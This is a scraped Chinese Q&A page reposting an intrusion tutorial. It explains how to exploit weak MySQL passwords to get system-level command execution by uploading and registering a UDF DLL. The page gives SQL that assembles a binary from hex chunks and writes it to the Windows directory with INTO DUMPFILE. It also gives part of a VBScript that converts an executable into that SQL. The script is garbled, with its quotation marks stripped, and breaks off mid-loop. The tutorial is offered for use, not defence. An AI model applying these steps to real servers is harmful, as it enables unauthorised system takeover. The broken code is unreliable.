如何入侵mysql数据库_如何创建数据库,如何利用弱口令入侵MySQL数据库

导航：网站首页 >

如何创建数据库,如何利用弱口令入侵MySQL数据库

时间：2018-3-9

相关问题:

匿名网友:

很早网上就有了用mysql弱口令得到webshell教程，但是这次我要说的不是得到webshell，而是直接得到系统权限，看清楚了，是“直接”得到！

首先，我简单说一下mysql弱口令得到系统权限得过程：首先利用mysql脚本上传udf dll文件，然后利用注册UDF

DLL中自写的Function函数，而执行任意命令。

思路很简单，网上也有一些教程，但是他们要么没有给具体的代码，要么一句话代过，搞得象我似得小菜很难理解，终于在我付出了几天得不断测试得辛勤劳动后，有了点结果，我把详细过程和相关代码得交给大家，这样大家就可以自己写dll文件，自己生成不同文件得二进制码啦！

下面，我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码(网友Mix用的方法)：

set @a =

concat('',0x0123abc1312389…..);

set @a = concat(@a,0x4658978abc545e……);

………………….

create table Mix(data LONGBLOB);//建表Mix,字段为data，类型为longblob

insert into Mix values();update Mix set data = @a;[email protected]插入表Mix

select

data from Mix into DUMPFILE 'C:\\Winnt\\文件名';//导出表中内容为文件

前两句很熟悉把，这个就是我们以前注入的时候，绕过’的解决办法，把代码的16进制数声明给一个变量，然后导入这个变量就行了。只不过这里，因为16进制代码是一个文件的内容，代码太长了，所以就用了concat函数不断把上次得代码类加起来，这样不断累计到一个变量a中。后面几句就很简单了，我都有注释。

后面三句好说，但是前面的那么多16进制数据，手工的话，累人啊！不过你还记得以前有一个exe2bat.vbs脚本吗？这次我们可以把这个脚本修改一下后，得到我们这里需要得mysql脚本！对比exe2bat.vbs生成得文件和我们需要脚本的文件格式，我们可以轻松的得到我们所需的脚本。脚本内容如下：

fp=wscript.arguments(0

fn=right(fp,len(fp)-instrrev(fp,\))

with

createobject(adodb.stream)

.type=1:.open:.loadfromfile

fp:str=.read:sl=lenb(str)

end with

sll=sl mod 65536:slh=sl\65536

with

createobject(scripting.filesystemobject).opentextfile(fp&.txt,2,true)

.write set @a = concat('',0x

for i=1 to sl

bt=ascb(midb(str,i,1))

if bt>

大家还关注:

问题推荐